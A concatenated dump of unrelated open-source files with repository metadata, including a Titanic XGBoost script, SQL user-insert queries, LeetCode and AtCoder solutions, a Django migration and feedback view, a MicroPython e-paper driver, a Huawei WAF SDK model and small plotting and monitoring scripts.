combine.loc[(combine['Fare'] > 14.454) & (combine['Fare'] <= 31), 'Fare'] = 2
combine.loc[ combine['Fare'] > 31, 'Fare'] = 3
combine['Fare'] = combine['Fare'].astype(int)
combine["Pclass"]=combine["Pclass"].astype("str")
combine = pd.get_dummies(combine)
#Defining learning vectors
nb = train.shape[0]
X = combine[:nb]
y = target
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.1, train_size=0.9)
#XGBoost model tuning
model = XGBClassifier(booster='gbtree', silent=1, seed=0, base_score=0.5, subsample=0.75)
parameters = {'n_estimators':[75], #50,100
'max_depth':[4],#1,10
'gamma':[4],#0,6
'max_delta_step':[1],#0,2
'min_child_weight':[1], #3,5
'colsample_bytree':[0.55,0.6,0.65], #0.5,
'learning_rate': [0.001,0.01,0.1]
}
tune_model = GridSearchCV(model, parameters, cv=3, scoring='accuracy')
tune_model.fit(X_train,y_train)
print('Best parameters :', tune_model.best_params_)
print('Results :', format(tune_model.cv_results_['mean_test_score'][tune_model.best_index_]*100))
#Learn on the whole data
tune_model.fit(X, y)
Y_pred = tune_model.predict(combine[nb:])
#Submit the prediction
submission = pd.DataFrame({
"PassengerId": test["PassengerId"],
"Survived": Y_pred
})
submission.to_csv('submission.csv', index=False)
# In[ ]:
|
[
"bitsorific@gmail.com"
] |
bitsorific@gmail.com
|
901f1bc9d292c42147ff6373749f92023a60771d
|
f77028577e88d228e9ce8252cc8e294505f7a61b
|
/web_backend/nvlserver/module/user/specification/create_user_specification.py
|
01c30c0f0202bb9a1c221340e3632c081cd325eb
|
[] |
no_license
|
Sud-26/Arkally
|
e82cebb7f907a3869443b714de43a1948d42519e
|
edf519067d0ac4c204c12450b6f19a446afc327e
|
refs/heads/master
| 2023-07-07T02:14:28.012545
| 2021-08-06T10:29:42
| 2021-08-06T10:29:42
| 392,945,826
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 691
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
create_user_element_query = """
INSERT INTO public."user" AS usr
(email, password, fullname, locked, language_id, meta_information,
account_type_id, active, deleted)
VALUES
($1, $2, $3, $4, $5, $6, $7, $8, FALSE) RETURNING *;
"""
create_user_element_query_front = """
INSERT INTO public."user" AS usr
(email, password, fullname, locked, language_id, meta_information,
account_type_id, active, gendar, companyName, address, city, postalcode, country, mobilenumber, webpage, updatebymails, vatid, deleted)
VALUES
($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15, $16, $17, $18, FALSE) RETURNING *;
"""
|
[
"sudhakar@satmatgroup.com"
] |
sudhakar@satmatgroup.com
|
9da0eadc5fc439cbbbfa4f8b4d71be538501e928
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03423/s386141222.py
|
32ef67cadf9e12133fae837a4a87668df41844e1
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 133
|
py
|
def main():
import sys
input = sys.stdin.readline
N = int(input())
print(N//3)
if __name__ == '__main__':
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
6a02c8fb4d49934aaaa161755b66b6468067b274
|
ed0dd577f03a804cdc274f6c7558fafaac574dff
|
/python/pyre/services/__init__.py
|
163504bbf5b01997c49c4e80a164a9d41b3fcac5
|
[
"Apache-2.0"
] |
permissive
|
leandromoreira/vmaf
|
fd26e2859136126ecc8e9feeebe38a51d14db3de
|
a4cf599444701ea168f966162194f608b4e68697
|
refs/heads/master
| 2021-01-19T03:43:15.677322
| 2016-10-08T18:02:22
| 2016-10-08T18:02:22
| 70,248,500
| 3
| 0
| null | 2016-10-07T13:21:28
| 2016-10-07T13:21:27
| null |
UTF-8
|
Python
| false
| false
| 772
|
py
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
def evaluator(name=None):
from Evaluator import Evaluator
return Evaluator(name)
def pickler(name=None):
from Pickler import Pickler
return Pickler(name)
def request(command, args=None):
from ServiceRequest import ServiceRequest
return ServiceRequest(command, args)
# version
__id__ = "$Id: __init__.py,v 1.1.1.1 2006-11-27 00:10:06 aivazis Exp $"
# End of file
|
[
"zli@netflix.com"
] |
zli@netflix.com
|
39a8dc422113338f86c9a52b0309b38e0cc34c95
|
3b88c7805cf6b8fb9a1e00470c7c6faebd7efa80
|
/src/outpost/django/geo/migrations/0022_auto_20221219_1728.py
|
92841f8165ec5c82eb8781f15ea220c83c9d0db0
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
medunigraz/outpost.django.geo
|
e84abc7a550b2d0e82f6bb58611039762543be67
|
04424d97c992b3d6f3ca16e9109df9c530a4ba2a
|
refs/heads/master
| 2023-07-24T03:37:50.531723
| 2022-12-19T19:29:14
| 2022-12-19T19:29:14
| 183,224,271
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,373
|
py
|
# Generated by Django 2.2.28 on 2022-12-19 16:28
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('geo', '0021_auto_20200805_1403'),
]
operations = [
migrations.AlterModelOptions(
name='node',
options={'get_latest_by': 'modified'},
),
migrations.AlterModelOptions(
name='pointofinterestinstance',
options={'get_latest_by': 'modified'},
),
migrations.AlterField(
model_name='level',
name='order',
field=models.PositiveIntegerField(db_index=True, editable=False, verbose_name='order'),
),
migrations.AlterField(
model_name='pointofinterest',
name='order',
field=models.PositiveIntegerField(db_index=True, editable=False, verbose_name='order'),
),
migrations.RunSQL(
"ALTER TABLE geo_room ALTER COLUMN layout type geometry(MultiPolygon, 3857) using ST_Multi(layout);",
state_operations=[
migrations.AlterField(
model_name='room',
name='layout',
field=django.contrib.gis.db.models.fields.MultiPolygonField(srid=3857),
),
],
)
]
|
[
"michael@fladi.at"
] |
michael@fladi.at
|
6ff07d0ed47b6d34994d78317a0abf2e183bcc46
|
99fca8eaa3fb5e93ed4ed857b439293bc0952c79
|
/Data Visualization Pandas/plot_1.py
|
e37cba6e99ff3c2c68fea4f574dddd99d7c01ca1
|
[] |
no_license
|
Ebyy/python_projects
|
7adb377f4e8eec94613e4e348f02c2ded306efac
|
0cacfab443d3eeeb274836b7be4b7205585f7758
|
refs/heads/master
| 2020-05-19T22:28:17.672051
| 2019-05-19T19:32:19
| 2019-05-19T19:32:19
| 185,240,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 852
|
py
|
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import style
import numpy as np
style.use('ggplot')
web_stats = {'Day': [1,2,3,4,5,6],
'Visitors': [43,53,34,45,64,34],
'Bounce_Rate': [65,72,62,64,54,66]}
df = pd.DataFrame(web_stats)
#print(df)
#print(df.head())
#print(df.tail())
print(df.tail(2)) # prints the last 2 rows
print(df.set_index('Day'))
#df.set_index('Day', inplace=True) or equate the function to
# a variable(df2) then print to set the index permanently
print(df.head())
# to reference a specific column
print(df['Bounce_Rate'])
#or
print(df.Visitors)
print(df[['Bounce_Rate', 'Visitors']]) # to reference two columns
print(df.Visitors.tolist())
print(np.array(df[['Bounce_Rate', 'Visitors']]))
df2 = pd.DataFrame(np.array(df[['Bounce_Rate', 'Visitors']]))
print(df2)
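# A minimal plotting sketch (an addition: the pyplot/style imports above are
# otherwise unused in this script):
df.set_index('Day')[['Visitors', 'Bounce_Rate']].plot()
plt.show()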
|
[
"eberechi_oo@yahoo.com"
] |
eberechi_oo@yahoo.com
|
d6f6f38657b6972b2a4266a44848d7eeb98c00b3
|
ba977400c6f7e23dd2934476d70db38f8d83c2e5
|
/visualization/92_plot_training.py
|
e155069e7bd9d7bd6c01606041bffd35fa3e54a9
|
[] |
no_license
|
jasonwei20/adaptable-image-classification
|
9b53396e7db84e4e025f7686bc6936b7b64fa5e1
|
4762d1a8a6a8151bfec0306d07525dc43048aba6
|
refs/heads/master
| 2021-02-11T08:36:21.327647
| 2020-04-05T16:53:20
| 2020-04-05T16:53:20
| 244,473,217
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,509
|
py
|
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import numpy as np
from pathlib import Path
from typing import (Dict, List)
checkpoint_folder_dict = { Path("/home/brenta/scratch/jason/checkpoints/voc/vanilla/exp_92a"): "Random (Baseline)",
Path("/home/brenta/scratch/jason/checkpoints/voc/vanilla/exp_92b"): "Highest 20 Percent by Gradient",
Path("/home/brenta/scratch/jason/checkpoints/voc/vanilla/exp_92c"): "Highest 10 Percent + Random Sample 10 Percent",
Path("/home/brenta/scratch/jason/checkpoints/voc/vanilla/exp_92d"): "Lowest 20 Percent by Graident", }
def get_image_names(folder: Path) -> List[Path]:
"""
Find the names and paths of all of the images in a folder.
Args:
folder: Folder containing images (assume folder only contains images).
Returns:
A list of the names with paths of the images in a folder.
"""
return sorted([
Path(f.name) for f in folder.iterdir() if ((
folder.joinpath(f.name).is_file()) and (".DS_Store" not in f.name))
],
key=str)
def checkpoint_folder_to_val_accs(checkpoint_folder):
tup_list = []
checkpoint_names = get_image_names(checkpoint_folder)
for checkpoint_name in checkpoint_names:
checkpoint_str = str(checkpoint_name)[:-3]
parts = checkpoint_str.split('_')
epoch_num = int(parts[1][1:])
mb_num = int(parts[2][2:])
val_acc = float(parts[3][2:])
tup = (mb_num, val_acc)
tup_list.append(tup)
tup_list = sorted(tup_list, key=lambda x:x[0])
mb_num_list = [x[0] for x in tup_list]
val_acc_list = [x[1] for x in tup_list]
return mb_num_list, val_acc_list
def plot_val_accs(output_path, checkpoint_folder_dict):
fig, ax = plt.subplots()
plt.ylim([-0.02, 1.02])
for checkpoint_folder in checkpoint_folder_dict:
mb_num_list, val_acc_list = checkpoint_folder_to_val_accs(checkpoint_folder)
plt.plot( mb_num_list, val_acc_list, label=checkpoint_folder_dict[checkpoint_folder] )
print(mb_num_list)
print(val_acc_list)
plt.legend(loc="lower right")
plt.title("CL performance on predicting image rotations (ResNet18, VOC RotNet)")
plt.xlabel("Minibatch Updates")
plt.ylabel("Validation Accuracy")
plt.savefig(output_path, dpi=400)
if __name__ == "__main__":
plot_val_accs("outputs/test_voc.png", checkpoint_folder_dict)
|
[
"jason.weng.wei@gmail.com"
] |
jason.weng.wei@gmail.com
|
7fd36cfa7f03dce19df244b78377d20894673f87
|
523f8f5febbbfeb6d42183f2bbeebc36f98eadb5
|
/41_2.py
|
f343d466c7476a09c8c0fa86b2be1400e2016843
|
[] |
no_license
|
saleed/LeetCode
|
655f82fdfcc3000400f49388e97fc0560f356af0
|
48b43999fb7e2ed82d922e1f64ac76f8fabe4baa
|
refs/heads/master
| 2022-06-15T21:54:56.223204
| 2022-05-09T14:05:50
| 2022-05-09T14:05:50
| 209,430,056
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 954
|
py
|
class Solution(object):
def firstMissingPositive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
        # Hash-table idea: we may not allocate extra memory for a real hash table, so we reuse nums itself as the table,
for i in range(len(nums)):
j=i
# print(j)
# while nums[j]>0 and nums[j]<=len(nums) and nums[j]!= j+1:
while nums[j] > 0 and nums[j] <= len(nums) and nums[nums[j]-1] != nums[j]:
# print(j,nums[j])
# nums[j],nums[nums[j]-1]=nums[nums[j]-1],nums[j]
tmp=nums[nums[j]-1]
nums[nums[j]-1]=nums[j]
nums[j]=tmp
print(nums)
for i in range(len(nums)):
if nums[i]!=i+1:
return i+1
return len(nums)+1
a=Solution()
# test1=[1,2,0]
# print(a.firstMissingPositive(test1))
test2=[-1,4,2,1,9,10]
print(a.firstMissingPositive(test2))
|
[
"1533441387@qq.com"
] |
1533441387@qq.com
|
8fd706f7e60376636515b21a0251659fca0ba11a
|
f16c091a4a5eacbf4baa4d9a5bd747de7e43c9fd
|
/webfeet.py
|
a1584157608c132d8d3b6f92699212dffebab86d
|
[
"BSD-3-Clause"
] |
permissive
|
tdsmithCapU/pymarc-ebooks-scripts
|
28c2e2040510cce2b28a12f098bf702f3b3fcc15
|
61cba8e4d83ea6621d2a004294c9cf29d6cdfff8
|
refs/heads/master
| 2021-05-28T16:53:23.540185
| 2014-11-07T20:25:09
| 2014-11-07T20:25:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 505
|
py
|
#!/usr/bin/env python
"""
outputs number of these terrible "Web Feet" records we had in our catalog
because we wanted to delete them all
"""
from pymarc import MARCReader
reader = MARCReader(open('ebooks.MRC'))
numWF = 0
op = ''
for record in reader:
op = ''
if record['245'] is not None:
if record['245']['c'] is not None:
if record['245']['c'] == '[selected by Web Feet].':
numWF += 1
print record.title()
print "Web Feet records: ", numWF
|
[
"phette23@gmail.com"
] |
phette23@gmail.com
|
1efba9bbb51a11c2017e78de5abfebea16dc6fd2
|
0afdfbe3f5b16ef9662d69968a3675a0b51766a7
|
/bin/svn-release
|
537c25a62d21dd59bb75a98bb9517ac4fd36cc7a
|
[] |
no_license
|
tumb1er/bamboo-build-tools
|
3fd5b54f28d037ef67d86e2d8c5f74b2400a28a6
|
c10f31850bfcd8fd3e5ba075740c4138482e541c
|
refs/heads/master
| 2021-01-02T08:39:32.697471
| 2019-01-22T06:35:32
| 2019-01-22T06:35:32
| 10,936,292
| 14
| 13
| null | 2015-12-24T15:47:00
| 2013-06-25T11:18:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,200
|
#!/usr/bin/env python
from optparse import OptionParser
import re
import sys
from bamboo.helpers import cerr
from bamboo.svn import SVNHelper
parser = OptionParser(
usage='%prog [options] <integration-task-key> <stable>',
epilog='if not task_key supplied, will take them from STDIN')
parser.add_option("-c", "--config-file", dest="configfile",
default='bamboo.cfg', help="read config from FILE",
metavar="FILE")
parser.add_option("-t", "--root", dest="root", default="^",
help="project root location")
parser.add_option("-i", "--interactive", dest="interactive", default=False,
action="store_true", help="confirm actions")
options, args = parser.parse_args()
if len(args) < 2:
parser.print_usage()
sys.exit(-1)
m = re.match(r'([A-Z]+)-[\d]+', args[0])
if not m:
cerr('invalid JIRA task key: ' + args[0])
sys.exit(-2)
if not re.match(r'^[\d]+\.(x|[\d]+\.(x|[\d]+))$', args[1]):
cerr('invalid stable: ' + args[1])
sys.exit(-2)
project_key = m.group(1)
svn = SVNHelper(project_key, root=options.root, configfile=options.configfile)
svn.release(args[0], args[1], interactive=options.interactive)
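# Example invocation (task key and stable version are illustrative):
#
#   svn-release PROJ-123 1.2.x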
|
[
"zimbler@gmail.com"
] |
zimbler@gmail.com
|
|
4da67f7240f871ec3438e461842e4d016a41d031
|
9da6036e7448a30d1b30fa054f0c8019215343f7
|
/epaper7in5b.py
|
60eec18a29920c0228b2d6d5ea7e89fa4cd224a6
|
[
"MIT"
] |
permissive
|
Markus-Be/micropython-waveshare-epaper
|
4e24a3535bade98d030b4259a089d9521b83f372
|
54e44f5eb1f58185f6ee4c3bf698a5b270584c8a
|
refs/heads/master
| 2020-03-17T23:25:02.684134
| 2018-02-25T22:02:23
| 2018-02-25T22:02:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,906
|
py
|
# MicroPython library for Waveshare 7.5" B/W/R e-paper display GDEW075Z09
from micropython import const
from time import sleep_ms
import ustruct
# Display resolution
EPD_WIDTH = const(640)
EPD_HEIGHT = const(384)
# Display commands
PANEL_SETTING = const(0x00)
POWER_SETTING = const(0x01)
POWER_OFF = const(0x02)
#POWER_OFF_SEQUENCE_SETTING = const(0x03)
POWER_ON = const(0x04)
#POWER_ON_MEASURE = const(0x05)
BOOSTER_SOFT_START = const(0x06)
DEEP_SLEEP = const(0x07)
DATA_START_TRANSMISSION_1 = const(0x10)
#DATA_STOP = const(0x11)
DISPLAY_REFRESH = const(0x12)
#IMAGE_PROCESS = const(0x13)
#LUT_FOR_VCOM = const(0x20)
#LUT_BLUE = const(0x21)
#LUT_WHITE = const(0x22)
#LUT_GRAY_1 = const(0x23)
#LUT_GRAY_2 = const(0x24)
#LUT_RED_0 = const(0x25)
#LUT_RED_1 = const(0x26)
#LUT_RED_2 = const(0x27)
#LUT_RED_3 = const(0x28)
#LUT_XON = const(0x29)
PLL_CONTROL = const(0x30)
#TEMPERATURE_SENSOR_COMMAND = const(0x40)
TEMPERATURE_CALIBRATION = const(0x41)
#TEMPERATURE_SENSOR_WRITE = const(0x42)
#TEMPERATURE_SENSOR_READ = const(0x43)
VCOM_AND_DATA_INTERVAL_SETTING = const(0x50)
#LOW_POWER_DETECTION = const(0x51)
TCON_SETTING = const(0x60)
TCON_RESOLUTION = const(0x61)
#SPI_FLASH_CONTROL = const(0x65)
#REVISION = const(0x70)
#GET_STATUS = const(0x71)
#AUTO_MEASUREMENT_VCOM = const(0x80)
#READ_VCOM_VALUE = const(0x81)
VCM_DC_SETTING = const(0x82)
FLASH_MODE = const(0xE5)
class EPD:
def __init__(self, spi, cs, dc, rst, busy):
self.spi = spi
self.cs = cs
self.dc = dc
self.rst = rst
self.busy = busy
self.cs.init(self.cs.OUT, value=1)
self.dc.init(self.dc.OUT, value=0)
self.rst.init(self.rst.OUT, value=0)
self.busy.init(self.busy.IN)
self.width = EPD_WIDTH
self.height = EPD_HEIGHT
def _command(self, command, data=None):
self.dc.low()
self.cs.low()
self.spi.write(bytearray([command]))
self.cs.high()
if data is not None:
self._data(data)
def _data(self, data):
self.dc.high()
self.cs.low()
self.spi.write(data)
self.cs.high()
def init(self):
self.reset()
self._command(POWER_SETTING, b'\x37\x00')
self._command(PANEL_SETTING, b'\xCF\x08')
self._command(BOOSTER_SOFT_START, b'\xC7\xCC\x28')
self._command(POWER_ON)
self.wait_until_idle()
self._command(PLL_CONTROL, b'\x3C')
self._command(TEMPERATURE_CALIBRATION, b'\x00')
self._command(VCOM_AND_DATA_INTERVAL_SETTING, b'\x77')
self._command(TCON_SETTING, b'\x22')
self._command(TCON_RESOLUTION, ustruct.pack(">HH", EPD_WIDTH, EPD_HEIGHT))
self._command(VCM_DC_SETTING, b'\x1E') # decide by LUT file
self._command(FLASH_MODE, b'\x03')
def wait_until_idle(self):
while self.busy.value() == 1:
sleep_ms(100)
def reset(self):
self.rst.low()
sleep_ms(200)
self.rst.high()
sleep_ms(200)
# draw the current frame memory
def display_frame(self, frame_buffer):
self._command(DATA_START_TRANSMISSION_1)
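        # each input byte holds four 2-bit pixels; pixel pairs are expanded
        # into one output byte of two 4-bit panel codes (0x0 / 0x3 / 0x4
        # select among black, white and red on this B/W/R panel)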
for i in range(0, self.width // 4 * self.height):
temp1 = frame_buffer[i]
j = 0
while (j < 4):
if ((temp1 & 0xC0) == 0xC0):
temp2 = 0x03
elif ((temp1 & 0xC0) == 0x00):
temp2 = 0x00
else:
temp2 = 0x04
temp2 = (temp2 << 4) & 0xFF
temp1 = (temp1 << 2) & 0xFF
j += 1
if ((temp1 & 0xC0) == 0xC0):
temp2 |= 0x03
elif ((temp1 & 0xC0) == 0x00):
temp2 |= 0x00
else:
temp2 |= 0x04
temp1 = (temp1 << 2) & 0xFF
self._data(bytearray([temp2]))
j += 1
self._command(DISPLAY_REFRESH)
sleep_ms(100)
self.wait_until_idle()
# to wake call reset() or init()
def sleep(self):
self._command(POWER_OFF)
self.wait_until_idle()
self._command(DEEP_SLEEP, b'\xA5')
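
# A hedged wiring sketch (pin numbers are assumptions for a generic ESP32
# board, not mandated by this driver):
#
#   from machine import Pin, SPI
#   spi = SPI(1, baudrate=2000000, polarity=0, phase=0)
#   epd = EPD(spi, cs=Pin(5), dc=Pin(17), rst=Pin(16), busy=Pin(4))
#   epd.init()
#   buf = bytearray(EPD_WIDTH // 4 * EPD_HEIGHT)  # 2 bits per pixel
#   epd.display_frame(buf)
#   epd.sleep()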
|
[
"mcauser@gmail.com"
] |
mcauser@gmail.com
|
d00852eda6279d4ffe2238dc7824a7afd39520d7
|
3151fabc3eb907d6cd1bb17739c215a8e95a6370
|
/storagetest/pkgs/pts/aio/__init__.py
|
d65ddb2e7f4c7fe45271498226071e84ce8e9a13
|
[
"MIT"
] |
permissive
|
txu2k8/storage-test
|
a3afe96dc206392603f4aa000a7df428d885454b
|
62a16ec57d619f724c46939bf85c4c0df82ef47c
|
refs/heads/master
| 2023-03-25T11:00:54.346476
| 2021-03-15T01:40:53
| 2021-03-15T01:40:53
| 307,604,046
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,366
|
py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
@file : __init__.py.py
@Time : 2020/11/12 17:17
@Author: Tao.Xu
@Email : tao.xu2008@outlook.com
"""
from .aio_stress import *
__all__ = ['AioStress']
"""
DBENCH
==============
https://dbench.samba.org/web/index.html
https://openbenchmarking.org/test/pts/dbench-1.0.0
DBENCH is a tool to generate I/O workloads to either a filesystem or to
a networked CIFS or NFS server. It can even talk to an iSCSI target.
DBENCH can be used to stress a filesystem or a server to see at which workload
it becomes saturated, and can also be used for prediction analysis to determine
"How many concurrent clients/applications performing this workload can my server
handle before response starts to lag?"
DBENCH provides a similar benchmarking and client emulation that is implemented
in SMBTORTURE using the BENCH-NBENCH test for CIFS, but DBENCH can play these
loadfiles onto a local filesystem instead of to a CIFS server.
Using a different type of loadfiles DBENCH can also generate and measure latency for NFS.
Features include:
1. Reading SMBTORTURE BENCH-NBENCH loadfiles and emulating this workload as posix
calls to a local filesystem
2. NFS style loadfiles which allows DBENCH to mimic the i/o pattern of a real
application doing real i/o to a real server.
3. iSCSI support and iSCSI style loadfiles.
Loadfiles
At the heart of DBENCH is the concept of a "loadfile". A loadfile is a sequence of operations
to be performed one statement at a time. This could be operations such as "Open file XYZ",
"Read 5 bytes from offset ABC", "Close the file", etc etc.
By carefully crafting a loadfile it is possible to describe an I/O pattern that almost exactly
matches what a particular application performs. While cumbersome to produce, such a
loadfile does allow you to describe exactly how/what an application performs and "replay" this
sequence of operations any time you want.
Each line in the DBENCH loadfile contain a timestamp for the operation.
This is used by DBENCH to try to keep the same rate of operations as the original application.
This is very useful since this allows to perform accurate scalability predictions based on the
exact application we are interested in. and not an artificial benchmark which may or may not
be relevant to our particular applications workload pattern.
"""
|
[
"tao.xu2008@outlook.com"
] |
tao.xu2008@outlook.com
|
39dc4db957a259186b8dda8fdafdf81bdf7c08aa
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-waf/huaweicloudsdkwaf/v1/model/list_statistics_response.py
|
37f0f31bc7acb2df13f6c9f35c68b04e2742fea8
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,097
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ListStatisticsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'body': 'list[CountItem]'
}
attribute_map = {
'body': 'body'
}
def __init__(self, body=None):
"""ListStatisticsResponse - a model defined in huaweicloud sdk"""
super(ListStatisticsResponse, self).__init__()
self._body = None
self.discriminator = None
if body is not None:
self.body = body
@property
def body(self):
"""Gets the body of this ListStatisticsResponse.
        Security statistics data
:return: The body of this ListStatisticsResponse.
:rtype: list[CountItem]
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this ListStatisticsResponse.
        Security statistics data
:param body: The body of this ListStatisticsResponse.
:type: list[CountItem]
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListStatisticsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
98add982addaab600ecf76da05cada48297224f9
|
53181572c4b22df4b569a9901bcd5347a3459499
|
/tuit_190315_songyuda/demo0322/integer.py
|
199c22c41f1d87f7184e01b623c85f7d1d6bf3de
|
[] |
no_license
|
edu-athensoft/ceit4101python_student
|
80ef067b77421fce76d04f778d5c6de8b12f676c
|
33cfa438c062d45e8d246b853e93d3c14b92ff2d
|
refs/heads/master
| 2020-07-30T01:04:21.084384
| 2020-07-27T02:21:57
| 2020-07-27T02:21:57
| 210,027,310
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
# data types
# number (integer, float)
# string
# decimal, hex, oct, bin
d1 = 11
h1 = 0xF
o1 = 0o10
b1 = 0b1100
# hex(), oct(), bin()
print(h1)
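# demonstrate the conversion helpers mentioned above (an addition):
print(hex(d1), oct(d1), bin(d1))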
|
[
"inf.athensoft@hotmail.com"
] |
inf.athensoft@hotmail.com
|
d5dc3e2fbf8dccb285ca1d21ad9ffb8564f280a0
|
b92b9f089ace00f8b301abca3d2871faf33f11af
|
/rrdpic/update.py
|
faf2f1214e0ed9382ff0f39eb1f193e972cfac4b
|
[] |
no_license
|
zhouyu37/study
|
c3453613d8b446478af61bf4df7910ec4649b536
|
a8b2702fc94e6abd6a15f21b833bb885ee011fa9
|
refs/heads/master
| 2021-03-17T22:15:25.924902
| 2020-03-13T08:32:55
| 2020-03-13T08:32:55
| 247,022,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 312
|
py
|
# -*- coding: utf-8 -*-
import rrdtool
import time, psutil
total_input_traffic = psutil.net_io_counters()[1]    # bytes received
total_output_traffic = psutil.net_io_counters()[0]   # bytes sent
starttime = int(time.time())
# rrdtool expects the timestamp first: "<timestamp>:<ds1>:<ds2>"
update = rrdtool.updatev('Flow.rrd', '%s:%s:%s' % (str(starttime), str(total_input_traffic), str(total_output_traffic)))
print(update)
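# A hedged one-time setup sketch (DS names, step, and RRA are assumptions and
# must match however Flow.rrd was actually defined):
#
#   rrdtool.create('Flow.rrd', '--step', '300',
#                  'DS:input:COUNTER:600:U:U',
#                  'DS:output:COUNTER:600:U:U',
#                  'RRA:AVERAGE:0.5:1:600')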
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
7b44072c08d20cbfaf773b21a7025382966bb70b
|
0f7496520832831a6ae89481fa994fb540882efd
|
/feedback/views.py
|
315627663293e3ce54660bf14f1b12cac40a1678
|
[
"ISC"
] |
permissive
|
pmaigutyak/mp-feedback
|
f88287f6aa7e5812e24f51f3ea14c1a8b2d98cb3
|
a5bcf5e67aeced62f048466b9e1354f5183f8eeb
|
refs/heads/master
| 2022-04-19T12:02:18.729823
| 2020-04-20T17:55:07
| 2020-04-20T17:55:07
| 257,354,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,545
|
py
|
from django.conf import settings
from django.apps import apps
from django.shortcuts import render
from django.http.response import HttpResponse
from django.views.generic import FormView
from django.core.mail import send_mail
from django.template.loader import render_to_string
from feedback.forms import FeedbackForm
class CreateFeedbackView(FormView):
form_class = FeedbackForm
def dispatch(self, request, *args, **kwargs):
self.is_modal = request.GET.get('modal', False)
return super().dispatch(request, *args, **kwargs)
def get_initial(self):
user = self.request.user
if user.is_authenticated:
return {
'name': user.get_full_name(),
'email': user.email
}
return self.initial
@property
def template_name(self):
return 'feedback/modal.html' if self.is_modal else 'feedback/view.html'
def form_valid(self, form):
obj = form.save(commit=False)
if self.request.user.is_authenticated:
obj.user = self.request.user
obj.save()
self.send_email_notification(obj)
self.send_sms_notification(obj)
message = render_to_string(
'feedback/success-message.html', {'object': obj})
return HttpResponse(message)
def form_invalid(self, form):
return render(
self.request,
'feedback/form.html' if self.is_modal else 'feedback/view.html',
{'form': form},
status=403)
def send_email_notification(self, obj):
context = self.get_notifications_context(obj)
subject = render_to_string('feedback/email/subject.txt', context)
html = render_to_string('feedback/email/message.html', context)
send_mail(
subject=subject.strip(),
message='',
from_email=settings.DEFAULT_FROM_EMAIL,
html_message=html,
recipient_list=self.get_email_recipients())
def get_email_recipients(self):
return [a[1] for a in settings.MANAGERS]
